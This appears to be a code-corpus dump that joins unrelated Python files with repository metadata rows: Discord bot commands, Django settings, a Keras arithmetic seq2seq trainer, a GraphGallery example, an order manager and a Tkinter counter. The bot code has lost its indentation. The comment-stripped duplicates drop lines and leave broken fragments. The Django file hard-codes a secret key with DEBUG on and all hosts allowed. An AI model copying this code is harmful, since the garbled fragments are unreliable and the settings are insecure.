await send(message, f"Identified {member.name}#{member.discriminator}, a.k.a {member.display_name}, I.D. {member.id} ({member.mention})", allowed_mentions = discord.AllowedMentions.none())
@client.command("", ["emoji", "?", "-"], "", "")
@client.command("", ["emoji", "?"], "emoji <lookup> [-]", "post an emoji by lookup ID")
async def command_emoji(command, message):
try:
await send(message, str(emoji(command[2])))
if len(command) == 4:
await message.delete()
except:
await send(message, "That resulted in an error.", reaction = "x")
raise
@client.command("", [("summary", "summarize"), "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?", "?"], "", "")
async def command_summarize(command, message):
url = command[2]
if url[0] == "<" and url[-1] == ">":
url = url[1:-1]
await message.edit(suppress = True)
rurl = f"https://api.smmry.com/?SM_API_KEY={config['api-keys']['sm']}"
if len(command) >= 4:
rurl += "&SM_LENGTH=" + command[3]
if len(command) >= 5:
rurl += "&SM_KEYWORD_COUNT=" + command[4]
rurl += "&SM_URL=" + url
r = requests.get(rurl)
data = r.json()
if "sm_api_error" in data:
error = data["sm_api_error"]
if error == 0:
await send(message, "Internal server problem with the SMMRY API; this is not your fault. Try again later.", reaction = "x")
elif error == 1:
await send(message, "Parameters are invalid. Check that you entered a real URL; otherwise, contact a developer.", reaction = "x")
elif error == 2:
await send(message, "This request has intentionally been restricted. Perhaps you have expended the API key's limit (100 per day).", reaction = "x")
elif error == 3:
await send(message, "Summarization error. This website might not be summarizable.")
else:
await send(message, (f"**{data['sm_api_title'].strip() or '(no title)'}**\n\n{data['sm_api_content'].strip() or '(no content)'}")[:2000])
if "sm_api_keyword_array" in data:
await message.channel.send(f"**Keywords**: {', '.join(data['sm_api_keyword_array'])}")
@client.command("", ["tsr", "?"], "", "")
async def command_toggle_suppress_reacts(command, message):
member = await get_member(message.guild, command[2], message.author)
await mod_data("tsr", lambda x: x ^ {member.id}, default = set())
await message.add_reaction("✅")
@client.command("", ["react", "..."], "", "")
async def command_react(command, message):
if not message.reference or not message.reference.resolved:
raise BotError("You need to refer to a message via reply!")
fails = []
for x in command[2:]:
try:
await message.reference.resolved.add_reaction(emoji(x))
except:
fails.append(x)
if fails:
await send(message, "The following emojis do not exist / could not have been added: " + ", ".join(fails))
else:
await message.delete()
# @client.command("", re.compile(r"\b[hH]?[eE][hH][eE]\b").search, "", "")
async def command_ehe_te_nandayo(command, message):
if message.author != client.user and time.time() - await get_data("ehe", message.author.id, default = 0) > (await get_data("ehecd", default = 30)):
await send(message, "**ehe te nandayo!?**", reaction = "?")
await set_data("ehe", message.author.id, time.time())
# @client.command("", re.compile(r"\[\w+\]").search, "", "")
async def command_emoji_react(command, message):
for c in re.findall(r"\[(\w+)\]", message.content):
try:
await message.add_reaction(emoji(c))
except:
pass
# @client.command("", re.compile(r"\b[Aa][Oo][Cc]\b").search, "", "")
async def command_aoc(command, message):
await message.channel.send("Alexandria Ocasio-Cortez")
# @client.command("", ["toggle69"], "", "")
async def command_toggle69(command, message):
await set_data("disable_69", not await get_data("disable_69", default = False))
await message.add_reaction("✅")
# @client.command("", re.compile(r"\b69\b").search, "", "")
async def command_69(command, message):
if await get_data("disable_69", default = False):
return
await message.reply("nice", mention_author = False) | true | true |
f722fb3d7cbf83a809ebb0d0351a924f41916c3e | 3,491 | py | Python | src/cfehome/settings.py | kuntalbanik/channels-rapid | 797939f3dc62d8b9424517ce6e4d3ea946330669 | [
"MIT"
] | null | null | null | src/cfehome/settings.py | kuntalbanik/channels-rapid | 797939f3dc62d8b9424517ce6e4d3ea946330669 | [
"MIT"
] | null | null | null | src/cfehome/settings.py | kuntalbanik/channels-rapid | 797939f3dc62d8b9424517ce6e4d3ea946330669 | [
"MIT"
] | null | null | null | """
Django settings for cfehome project.
Generated by 'django-admin startproject' using Django 2.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'em-9$ln6^a0z!s2pbo=mu*l$cgnqgsyd_z21f-%2d(_h7*wu^0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'channels',
'chat',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cfehome.urls'
ASGI_APPLICATION = "cfehome.routing.application"
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cfehome.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [("localhost", 6379)],
# For heroku
# "hosts": [os.environ.get('REDIS_URL', 'redis://localhost:6379')],
},
},
} | 26.052239 | 91 | 0.679461 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'em-9$ln6^a0z!s2pbo=mu*l$cgnqgsyd_z21f-%2d(_h7*wu^0'
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'channels',
'chat',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cfehome.urls'
ASGI_APPLICATION = "cfehome.routing.application"
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cfehome.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [("localhost", 6379)],
# For heroku
# "hosts": [os.environ.get('REDIS_URL', 'redis://localhost:6379')],
},
},
} | true | true |
f722fbdc8a2912619c3582d0d56c9652a27d6fb1 | 7,839 | py | Python | addition-subtractor.py | rapirent/DSAI-HW3 | ee83990f511049b8d53be5765040ab2068af6c3f | [
"MIT"
] | 1 | 2020-06-12T17:24:26.000Z | 2020-06-12T17:24:26.000Z | addition-subtractor.py | kuoteng/Arithmetic-Operation-Seq2Seq | ee83990f511049b8d53be5765040ab2068af6c3f | [
"MIT"
] | null | null | null | addition-subtractor.py | kuoteng/Arithmetic-Operation-Seq2Seq | ee83990f511049b8d53be5765040ab2068af6c3f | [
"MIT"
] | null | null | null |
# coding: utf-8
from keras.models import Sequential
from keras import layers
import numpy as np
import matplotlib.pyplot as plt
from six.moves import range
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_size', default='45000')
parser.add_argument('--train_size', default='40000')
parser.add_argument('--digits', default='3')
parser.add_argument('--epoch', default='2')
parser.add_argument('--activation', default='softmax')
parser.add_argument('--output_name', default='model_1')
args = parser.parse_args()
# # Parameters Config
class colors:
ok = '\033[92m'
fail = '\033[91m'
close = '\033[0m'
DATA_SIZE = int(args.data_size)
TRAIN_SIZE = int(args.train_size)
DIGITS = int(args.digits)
REVERSE = False
MAXLEN = DIGITS + 1 + DIGITS
chars = '0123456789+- '
RNN = layers.LSTM
HIDDEN_SIZE = 128
BATCH_SIZE = 128
EPOCH_SIZE = int(args.epoch)
LAYERS = 1
ACTIVATION = args.activation
output_file = open('./data/as-' + args.output_name, 'w')
print('DATA_SIZE = ', DATA_SIZE , file=output_file)
print('TRAIN_SIZE = ', TRAIN_SIZE, file=output_file)
print('DIGITS = ', DIGITS, file=output_file)
print('EPOCH_SIZE = ', EPOCH_SIZE, file=output_file)
print('ACTIVATION = ', ACTIVATION, file=output_file)
class CharacterTable(object):
def __init__(self, chars):
self.chars = sorted(set(chars))
self.char_indices = dict((c, i) for i, c in enumerate(self.chars))
self.indices_char = dict((i, c) for i, c in enumerate(self.chars))
def encode(self, C, num_rows):
x = np.zeros((num_rows, len(self.chars)))
for i, c in enumerate(C):
x[i, self.char_indices[c]] = 1
return x
def decode(self, x, calc_argmax=True):
if calc_argmax:
x = x.argmax(axis=-1)
return "".join(self.indices_char[i] for i in x)
ctable = CharacterTable(chars)
ctable.indices_char
# # Data Generation
questions = []
expected = []
seen = set()
print('Generating data...')
while len(questions) < DATA_SIZE:
f = lambda: int(''.join(np.random.choice(list('0123456789')) for i in range(np.random.randint(1, DIGITS + 1))))
a, b = f(), f()
if len(questions) % 2 == 0:
q = '{}-{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a - b)
else:
q = '{}+{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a + b)
if q in seen:
continue
seen.add(q)
ans += ' ' * (DIGITS + 1 - len(ans))
if REVERSE:
query = query[::-1]
questions.append(query)
expected.append(ans)
print('Total addition questions:', len(questions))
print(questions[:5], expected[:5])
# # Processing
print('Vectorization... (to the one-hot encoding)')
x = np.zeros((len(questions), MAXLEN, len(chars)), dtype=np.bool)
y = np.zeros((len(expected), DIGITS + 1, len(chars)), dtype=np.bool)
for i, sentence in enumerate(questions):
x[i] = ctable.encode(sentence, MAXLEN)
for i, sentence in enumerate(expected):
y[i] = ctable.encode(sentence, DIGITS + 1)
indices = np.arange(len(y))
np.random.shuffle(indices)
print(indices)
x = x[indices]
y = y[indices]
# train_test_split
train_x = x[:TRAIN_SIZE]
train_y = y[:TRAIN_SIZE]
test_x = x[TRAIN_SIZE:]
test_y = y[TRAIN_SIZE:]
print('Training Data:')
print(train_x.shape)
print(train_y.shape)
split_at = len(train_x) - len(train_x) // 10
print('split_at', split_at)
(x_train, x_val) = train_x[:split_at], train_x[split_at:]
(y_train, y_val) = train_y[:split_at], train_y[split_at:]
print('Training Data:')
print(x_train.shape)
print(y_train.shape)
print('Validation Data:')
print(x_val.shape)
print(y_val.shape)
print('Testing Data:')
print(test_x.shape)
print(test_y.shape)
print("input: ", x_train[:3], '\n\n', "label: ", y_train[:3])
# # Build Model
print('Build model...')
model = Sequential()
model.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))
model.add(layers.RepeatVector(DIGITS + 1))
for _ in range(LAYERS):
model.add(RNN(HIDDEN_SIZE, return_sequences=True))
model.add(layers.TimeDistributed(layers.Dense(len(chars))))
model.add(layers.Activation(ACTIVATION))
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
print('train set = ', x_train.shape, 'validation set = ', x_val.shape, file=output_file)
acc = []
val_acc = []
loss = []
val_loss = []
# # Training
for loop in range(100):
print()
print('-' * 50)
print('Train Loop Num:', loop)
history = model.fit(x_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCH_SIZE,
validation_data=(x_val, y_val),
shuffle=True)
acc += history.history['acc']
val_acc += history.history['val_acc']
loss += history.history['loss']
val_loss += history.history['val_loss']
print('loop ', loop, file=output_file)
print('acc = {} '.format(history.history['acc']), end='', file=output_file)
print('val_acc = {} '.format(history.history['val_acc']), end='', file=output_file)
print('loss = {} '.format(history.history['loss']), end='', file=output_file)
print('val_loss = {} '.format(history.history['val_loss']), file=output_file)
print('-' * 50 , file=output_file)
for i in range(10):
ind = np.random.randint(0, len(x_val))
rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]
preds = model.predict_classes(rowx, verbose=0)
q = ctable.decode(rowx[0])
correct = ctable.decode(rowy[0])
guess = ctable.decode(preds[0], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
# # Testing
print("MSG : Prediction")
print("-" * 50)
right = 0
preds = model.predict_classes(test_x, verbose=0)
for i in range(len(preds)):
q = ctable.decode(test_x[i])
correct = ctable.decode(test_y[i])
guess = ctable.decode(preds[i], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
right += 1
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
print("MSG : Accuracy is {}".format(right / len(preds)))
print("MSG : Accuracy is {}".format(right / len(preds)), file=output_file)
model.save('./models/as-' + args.output_name + '.h5')
with open('./corpus/as-' + args.output_name + '-training-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_train, y_train):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-validation-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_val, y_val):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-testing-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(test_x, test_y):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
plt.plot(acc)
plt.plot(val_acc)
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-accuracy-' + args.output_name + '.png')
plt.clf()
# summarize history for loss
plt.plot(loss)
plt.plot(val_loss)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-loss-' + args.output_name + '.png')
output_file.close()
plt.clf()
| 31.231076 | 115 | 0.638985 |
from keras.models import Sequential
from keras import layers
import numpy as np
import matplotlib.pyplot as plt
from six.moves import range
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_size', default='45000')
parser.add_argument('--train_size', default='40000')
parser.add_argument('--digits', default='3')
parser.add_argument('--epoch', default='2')
parser.add_argument('--activation', default='softmax')
parser.add_argument('--output_name', default='model_1')
args = parser.parse_args()
ok = '\033[92m'
fail = '\033[91m'
close = '\033[0m'
DATA_SIZE = int(args.data_size)
TRAIN_SIZE = int(args.train_size)
DIGITS = int(args.digits)
REVERSE = False
MAXLEN = DIGITS + 1 + DIGITS
chars = '0123456789+- '
RNN = layers.LSTM
HIDDEN_SIZE = 128
BATCH_SIZE = 128
EPOCH_SIZE = int(args.epoch)
LAYERS = 1
ACTIVATION = args.activation
output_file = open('./data/as-' + args.output_name, 'w')
print('DATA_SIZE = ', DATA_SIZE , file=output_file)
print('TRAIN_SIZE = ', TRAIN_SIZE, file=output_file)
print('DIGITS = ', DIGITS, file=output_file)
print('EPOCH_SIZE = ', EPOCH_SIZE, file=output_file)
print('ACTIVATION = ', ACTIVATION, file=output_file)
class CharacterTable(object):
def __init__(self, chars):
self.chars = sorted(set(chars))
self.char_indices = dict((c, i) for i, c in enumerate(self.chars))
self.indices_char = dict((i, c) for i, c in enumerate(self.chars))
def encode(self, C, num_rows):
x = np.zeros((num_rows, len(self.chars)))
for i, c in enumerate(C):
x[i, self.char_indices[c]] = 1
return x
def decode(self, x, calc_argmax=True):
if calc_argmax:
x = x.argmax(axis=-1)
return "".join(self.indices_char[i] for i in x)
ctable = CharacterTable(chars)
ctable.indices_char
xpected = []
seen = set()
print('Generating data...')
while len(questions) < DATA_SIZE:
f = lambda: int(''.join(np.random.choice(list('0123456789')) for i in range(np.random.randint(1, DIGITS + 1))))
a, b = f(), f()
if len(questions) % 2 == 0:
q = '{}-{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a - b)
else:
q = '{}+{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a + b)
if q in seen:
continue
seen.add(q)
ans += ' ' * (DIGITS + 1 - len(ans))
if REVERSE:
query = query[::-1]
questions.append(query)
expected.append(ans)
print('Total addition questions:', len(questions))
print(questions[:5], expected[:5])
orization... (to the one-hot encoding)')
x = np.zeros((len(questions), MAXLEN, len(chars)), dtype=np.bool)
y = np.zeros((len(expected), DIGITS + 1, len(chars)), dtype=np.bool)
for i, sentence in enumerate(questions):
x[i] = ctable.encode(sentence, MAXLEN)
for i, sentence in enumerate(expected):
y[i] = ctable.encode(sentence, DIGITS + 1)
indices = np.arange(len(y))
np.random.shuffle(indices)
print(indices)
x = x[indices]
y = y[indices]
train_x = x[:TRAIN_SIZE]
train_y = y[:TRAIN_SIZE]
test_x = x[TRAIN_SIZE:]
test_y = y[TRAIN_SIZE:]
print('Training Data:')
print(train_x.shape)
print(train_y.shape)
split_at = len(train_x) - len(train_x) // 10
print('split_at', split_at)
(x_train, x_val) = train_x[:split_at], train_x[split_at:]
(y_train, y_val) = train_y[:split_at], train_y[split_at:]
print('Training Data:')
print(x_train.shape)
print(y_train.shape)
print('Validation Data:')
print(x_val.shape)
print(y_val.shape)
print('Testing Data:')
print(test_x.shape)
print(test_y.shape)
print("input: ", x_train[:3], '\n\n', "label: ", y_train[:3])
model...')
model = Sequential()
model.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))
model.add(layers.RepeatVector(DIGITS + 1))
for _ in range(LAYERS):
model.add(RNN(HIDDEN_SIZE, return_sequences=True))
model.add(layers.TimeDistributed(layers.Dense(len(chars))))
model.add(layers.Activation(ACTIVATION))
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
print('train set = ', x_train.shape, 'validation set = ', x_val.shape, file=output_file)
acc = []
val_acc = []
loss = []
val_loss = []
in range(100):
print()
print('-' * 50)
print('Train Loop Num:', loop)
history = model.fit(x_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCH_SIZE,
validation_data=(x_val, y_val),
shuffle=True)
acc += history.history['acc']
val_acc += history.history['val_acc']
loss += history.history['loss']
val_loss += history.history['val_loss']
print('loop ', loop, file=output_file)
print('acc = {} '.format(history.history['acc']), end='', file=output_file)
print('val_acc = {} '.format(history.history['val_acc']), end='', file=output_file)
print('loss = {} '.format(history.history['loss']), end='', file=output_file)
print('val_loss = {} '.format(history.history['val_loss']), file=output_file)
print('-' * 50 , file=output_file)
for i in range(10):
ind = np.random.randint(0, len(x_val))
rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]
preds = model.predict_classes(rowx, verbose=0)
q = ctable.decode(rowx[0])
correct = ctable.decode(rowy[0])
guess = ctable.decode(preds[0], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
SG : Prediction")
print("-" * 50)
right = 0
preds = model.predict_classes(test_x, verbose=0)
for i in range(len(preds)):
q = ctable.decode(test_x[i])
correct = ctable.decode(test_y[i])
guess = ctable.decode(preds[i], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
right += 1
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
print("MSG : Accuracy is {}".format(right / len(preds)))
print("MSG : Accuracy is {}".format(right / len(preds)), file=output_file)
model.save('./models/as-' + args.output_name + '.h5')
with open('./corpus/as-' + args.output_name + '-training-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_train, y_train):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-validation-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_val, y_val):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-testing-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(test_x, test_y):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
plt.plot(acc)
plt.plot(val_acc)
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-accuracy-' + args.output_name + '.png')
plt.clf()
plt.plot(loss)
plt.plot(val_loss)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-loss-' + args.output_name + '.png')
output_file.close()
plt.clf()
| true | true |
f722fd5eb426dd588840264e173ac746d19da740 | 782 | py | Python | examples/Graph_Neural_Networks/PyTorch/TrimmedGCN.py | EdisonLeeeee/GraphGallery | 4eec9c5136bda14809bd22584b26cc346cdb633b | [
"MIT"
] | 300 | 2020-08-09T04:27:41.000Z | 2022-03-30T07:43:41.000Z | examples/Graph_Neural_Networks/PyTorch/TrimmedGCN.py | EdisonLeeeee/GraphGallery | 4eec9c5136bda14809bd22584b26cc346cdb633b | [
"MIT"
] | 5 | 2020-11-05T06:16:50.000Z | 2021-12-11T05:05:22.000Z | examples/Graph_Neural_Networks/PyTorch/TrimmedGCN.py | EdisonLeeeee/GraphGallery | 4eec9c5136bda14809bd22584b26cc346cdb633b | [
"MIT"
] | 51 | 2020-09-23T15:37:12.000Z | 2022-03-05T01:28:56.000Z | #!/usr/bin/env python
# coding: utf-8
import torch
import graphgallery
print("GraphGallery version: ", graphgallery.__version__)
print("Torch version: ", torch.__version__)
'''
Load Datasets
- cora/citeseer/pubmed
'''
from graphgallery.datasets import NPZDataset
data = NPZDataset('cora', root="~/GraphData/datasets/", verbose=False, transform='standardize')
graph = data.graph
splits = data.split_nodes(random_state=15)
graphgallery.set_backend("pytorch")
from graphgallery.gallery.nodeclas import TrimmedGCN
trainer = TrimmedGCN(device="gpu", seed=123).setup_graph(graph).build()
trainer.fit(splits.train_nodes, splits.val_nodes, verbose=1, epochs=100)
results = trainer.evaluate(splits.test_nodes)
print(f'Test loss {results.loss:.5}, Test accuracy {results.accuracy:.2%}')
| 30.076923 | 95 | 0.774936 |
import torch
import graphgallery
print("GraphGallery version: ", graphgallery.__version__)
print("Torch version: ", torch.__version__)
from graphgallery.datasets import NPZDataset
data = NPZDataset('cora', root="~/GraphData/datasets/", verbose=False, transform='standardize')
graph = data.graph
splits = data.split_nodes(random_state=15)
graphgallery.set_backend("pytorch")
from graphgallery.gallery.nodeclas import TrimmedGCN
trainer = TrimmedGCN(device="gpu", seed=123).setup_graph(graph).build()
trainer.fit(splits.train_nodes, splits.val_nodes, verbose=1, epochs=100)
results = trainer.evaluate(splits.test_nodes)
print(f'Test loss {results.loss:.5}, Test accuracy {results.accuracy:.2%}')
| true | true |
f722fdd93e7acefd5b4367b293047080207962d1 | 1,255 | py | Python | tmtrader/exchange_for_backtest/order_manager.py | reouno/tomatorader | b781206051129fa59439a0f314f4f1ed647a6852 | [
"MIT"
] | null | null | null | tmtrader/exchange_for_backtest/order_manager.py | reouno/tomatorader | b781206051129fa59439a0f314f4f1ed647a6852 | [
"MIT"
] | null | null | null | tmtrader/exchange_for_backtest/order_manager.py | reouno/tomatorader | b781206051129fa59439a0f314f4f1ed647a6852 | [
"MIT"
] | null | null | null | from typing import List
from tmtrader.entity.order import BasicOrder, FilledBasicOrder
from tmtrader.entity.trade import Trade
class OrderManager:
def __init__(self):
self.__open_orders: List[BasicOrder] = list()
self.__filled_orders: List[FilledBasicOrder] = list()
# TODO: refactor and define ClosedOrder and CancelledOrder
self.__cancelled_orders: List[BasicOrder] = list()
self.__trades: List[Trade] = list()
@property
def open_orders(self) -> List[BasicOrder]:
return self.__open_orders
@property
def filled_orders(self) -> List[FilledBasicOrder]:
return self.__filled_orders
@property
def cancelled_orders(self) -> List[BasicOrder]:
return self.__cancelled_orders
@property
def trades(self) -> List[Trade]:
return self.__trades
def add_open_orders(self, orders: List[BasicOrder]):
self.__open_orders.extend(orders)
def add_filled_orders(self, orders: List[FilledBasicOrder]):
self.__filled_orders.extend(orders)
def add_cancelled_orders(self, orders: List[BasicOrder]):
self.__cancelled_orders.extend(orders)
def add_trades(self, trades: List[Trade]):
self.__trades.extend(trades)
| 29.186047 | 66 | 0.700398 | from typing import List
from tmtrader.entity.order import BasicOrder, FilledBasicOrder
from tmtrader.entity.trade import Trade
class OrderManager:
def __init__(self):
self.__open_orders: List[BasicOrder] = list()
self.__filled_orders: List[FilledBasicOrder] = list()
self.__cancelled_orders: List[BasicOrder] = list()
self.__trades: List[Trade] = list()
@property
def open_orders(self) -> List[BasicOrder]:
return self.__open_orders
@property
def filled_orders(self) -> List[FilledBasicOrder]:
return self.__filled_orders
@property
def cancelled_orders(self) -> List[BasicOrder]:
return self.__cancelled_orders
@property
def trades(self) -> List[Trade]:
return self.__trades
def add_open_orders(self, orders: List[BasicOrder]):
self.__open_orders.extend(orders)
def add_filled_orders(self, orders: List[FilledBasicOrder]):
self.__filled_orders.extend(orders)
def add_cancelled_orders(self, orders: List[BasicOrder]):
self.__cancelled_orders.extend(orders)
def add_trades(self, trades: List[Trade]):
self.__trades.extend(trades)
| true | true |
f722fdf903135f2143fb5c022bd33aa1336afbd0 | 2,464 | py | Python | _Tkinter/Tkinter_Count.py | meigrafd/Sample-Code | 7065950dfd0728cfad66db08327f0efa4c26999c | [
"MIT"
] | 10 | 2017-02-08T18:36:09.000Z | 2021-03-31T04:22:25.000Z | _Tkinter/Tkinter_Count.py | meigrafd/Sample-Code | 7065950dfd0728cfad66db08327f0efa4c26999c | [
"MIT"
] | 2 | 2017-01-30T22:15:43.000Z | 2017-09-01T21:49:29.000Z | _Tkinter/Tkinter_Count.py | meigrafd/Sample-Code | 7065950dfd0728cfad66db08327f0efa4c26999c | [
"MIT"
] | 8 | 2017-02-09T12:33:47.000Z | 2021-04-03T13:34:33.000Z | #!/usr/bin/python3
# coding: utf-8
from tkinter import *
BGCOLOR="#229"
def Hochzaehlen(event=None):
sollwert.set(sollwert.get() + 1)
def Runterzaehlen(event=None):
sollwert.set(sollwert.get() - 1)
def Bestaetigen():
bestaetigen = "Eingestellter Sollwert " + str(sollwert.get())
confirm_label.config(text=bestaetigen)
confirmed.set(True)
def Starten():
if confirmed.get() == True:
read_sensor_data(istwert_label)
def read_sensor_data(label):
istwert.set(istwert.get() + 1)
if istwert.get() == sollwert.get():
confirmed.set(False)
istwert.set(0)
else:
label.after(1000, read_sensor_data, label)
# Main Window: Fullscreen
window = Tk()
w = window.winfo_screenwidth()
h = window.winfo_screenheight()
window.geometry(str(w) +"x"+ str(h) +"+0+0")
window.configure(background=BGCOLOR)
#window["bg"] = BGCOLOR
istwert = IntVar()
sollwert = IntVar()
confirmed = BooleanVar()
confirmed.set(False)
